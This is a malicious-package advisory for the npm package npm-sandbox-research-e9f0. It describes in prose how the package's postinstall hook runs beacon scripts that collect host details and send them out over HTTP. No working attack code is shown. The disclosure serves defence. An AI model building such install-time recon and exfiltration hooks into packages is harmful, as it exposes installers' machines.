—

MAL-2026-5762

Malicious code in npm-sandbox-research-e9f0 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a18a9932f78294e22aa0a85077b9318233ab0952bc8788ae8987fce3e5002c93) Package declares a postinstall hook ("postinstall": "node run.js") that executes automatically on npm install. The tarball ships beacon scripts (beacon13.js, beacon_linux.js) that combine require('child_process'), require('os'), and require('http')/http.request to gather host identifiers (os.hostname(), os.platform()) and transmit them via HTTP POST/GET requests. This is the canonical install-time host-recon and exfiltration shape: lifecycle hook auto-execution, host enumeration via the os module, command execution capability via child_process, and outbound HTTP. Installing this package causes immediate disclosure of host metadata and provides a code-execution surface on the installer's machine.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / npm-sandbox-research-e9f0

No fixed version published yet for npm-sandbox-research-e9f0 (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/npm-sandbox-research-e9f0/v/1.0.0 [PACKAGE]